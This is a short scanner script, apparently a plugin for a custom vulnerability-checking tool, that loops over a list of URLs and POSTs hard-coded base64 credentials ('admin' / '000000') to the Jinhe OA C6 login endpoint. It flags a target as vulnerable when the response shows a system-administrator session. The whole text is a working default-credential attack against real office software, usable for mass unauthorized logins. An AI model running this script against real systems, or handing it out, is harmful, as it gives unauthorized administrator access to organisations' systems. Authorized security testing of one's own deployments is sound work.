#request urls = array
#define payload = /C6/Jhsoft.Web.login/AjaxForLogin.aspx
#define bug = 系统管理员
#define info = 金和OA C6 管理员默认口令
#define post = type=login&loginCode=YWRtaW4=&&pwd=MDAwMDAw&

function main(args)
{
	printclolor("当前正在检测:".info,1);
	i = 0;
	num = GetArrayNum(urls);
	while(i<num){
		url = urls[i];
		try{
			res = HttpPost(url.payload,post,"Content-Type: application/x-www-form-urlencoded".StrRN()."User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0");
			if(StrFindStr(res[0],bug,0)!= "-1")
			{
				printclolor("[+]".urls[i].info,3);
			}
		}catch{
		}
		i = ToInt(i+1);
	}
}
